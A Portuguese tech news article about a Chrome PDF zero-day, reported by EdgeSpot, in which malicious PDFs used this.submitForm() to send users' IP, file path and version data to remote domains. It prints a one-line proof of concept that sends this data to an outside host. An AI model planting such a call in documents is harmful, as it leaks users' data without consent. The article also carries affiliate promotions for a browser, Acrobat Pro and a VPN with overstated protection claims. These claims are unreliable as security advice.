O serviço de detecção de exploração EdgeSpot descobriu uma vulnerabilidade intrigante do Chrome zero-day explorando documentos PDF.
A vulnerabilidade permite que os invasores colham dados confidenciais usando documentos PDF maliciosos abertos no Chrome.
Assim que a vítima abre os respectivos arquivos PDF no Google Chrome, um programa malicioso começa a trabalhar em segundo plano, coletando dados do usuário.
Os dados são então encaminhados para o servidor remoto que está sendo controlado pelos hackers. Você pode estar se perguntando quais dados estão sendo sugados pelos invasores, eles visam os seguintes dados em seu PC:
- endereço de IP
- Caminho completo do arquivo PDF no sistema
- Versões do sistema operacional e do Chrome
Cuidado com arquivos PDF repletos de malware
Os especialistas descobriram que um dos dois domínios readnotify [.] com ou burpcollaborator [.] net estava recebendo os dados.
Eles revelaram que os invasores estão usando o this.submitForm () PDF Javascript API para coletar informações confidenciais dos usuários.
Nós o testamos com um PoC mínimo, uma chamada de API simples como this.submitForm ('http://google.com/test') fará com que o Google Chrome envie os dados pessoais para google.com.
Este bug do Chrome estava sendo explorado por dois conjuntos distintos de arquivos PDF maliciosos, ambos circulados em outubro de 2017 e setembro de 2018, respectivamente.
Notavelmente, os dados coletados podem ser usados pelos invasores para ajustar os ataques no futuro. Os relatórios sugerem que o primeiro lote de arquivos foi compilado usando o serviço de rastreamento de PDF do ReadNotify.
Os usuários podem utilizar o serviço para controlar as visualizações do usuário. EdgeSpot não compartilhou nenhum detalhe sobre a natureza do segundo conjunto de arquivos PDF.
Dica rápida: mude seu navegador para Opera
Nestes tempos difíceis, somos atacados com malware, phishing e trojans a cada passo, então temos que estar muito mais vigilantes e ficar protegidos.
E como este é um problema específico do Chrome, você pode evitar essa ameaça e todas as outras com um navegador orientado para a segurança como o Opera.
Este navegador vem com um bloqueador de anúncios integrado que não apenas elimina essas distrações, mas também bloqueia scripts de análise, pixels de rastreamento e métodos para coletar seus dados.
E se você quiser ter certeza absoluta de que está longe de qualquer perigo, conte com o serviço VPN integrado que é 100% gratuito para uso por tempo ilimitado.
Ópera
O Opera oferece a proteção perfeita contra ameaças com o bloqueador de anúncios integrado e serviço VPN gratuitamente! Pegue de graça Visite o siteComo posso ficar protegido contra vulnerabilidades de PDF?
Baixe Adobe Acrobat PRO
Adobe e Chrome são uma boa combinação quando se trata de lidar com arquivos PDF. Ao instalar a extensão Adobe para Chrome, você pode revisar e manipular PDFs de acordo com sua preferência, sem sair de seu navegador favorito.
Apesar de sua estrutura robusta, o malware oculto em arquivos PDF pode não ser detectado se você estiver usando a versão padrão do Reader.
A versão profissional é recomendada para garantir sua proteção e manter seus dados longe de hackers.
Embora não seja gratuito, o preço que você vai pagar é bastante pequeno para a infinidade de recursos adicionais que você irá desfrutar, incluindo a segurança aprimorada de seus arquivos PDF.
Há também um teste gratuito de 7 dias incluído para que você possa ter uma amostra da experiência Pro completa antes de fazer a compra.
Adobe Acrobat PRO
Fique longe de malware baixando Adobe Acrobat PRO. Tem muito mais recursos do que a versão gratuita e mantém seus dados seguros. Teste grátis Visite o site Leia maisCaso queira estar seguro enquanto navega na internet, você precisará obter uma ferramenta totalmente dedicada para proteger sua rede. Instale agora o acesso privado à Internet e proteja-se. Ele protege seu PC de ataques durante a navegação, mascara seu endereço IP e bloqueia todos os acessos indesejados.
O serviço de detecção de exploração EdgeSpot queria alertar os usuários do Chrome sobre os riscos potenciais porque o patch não deveria ser lançado em um futuro próximo.
EdgeSpot relatou ao Google sobre a vulnerabilidade no ano passado e a empresa prometeu lançar um patch no final de abril.
No entanto, você pode considerar o uso de uma solução temporária para o problema, visualizando localmente os documentos PDF recebidos usando outro aplicativo leitor.
Como alternativa, você também pode abrir seus documentos PDF no Chrome, desconectando seus sistemas da Internet.
FAQ: Saiba mais sobre as extensões do Chrome
- O Privacy Badger funciona com o Chrome??
Sim. Mas se você quiser uma seleção mais ampla, explore nossas principais opções para extensões de privacidade do Chrome neste guia completo.
- Você pode editar PDFs no Chrome??
Existem muitas extensões que permitem o processamento de PDFs. Confira nosso excelente guia sobre as melhores extensões de PDF para o Chrome.
- O Google tem um gerador de código QR?
Não tem, mas você pode ativá-lo rapidamente. Aqui está nosso guia completo sobre como habilitar o gerador de código QR no Chrome.
Nota do editor: Esta postagem foi publicada originalmente em abril de 2020 e, desde então, foi reformulada e atualizada em agosto de 2020 para atualização, precisão e abrangência.
- Cíber segurança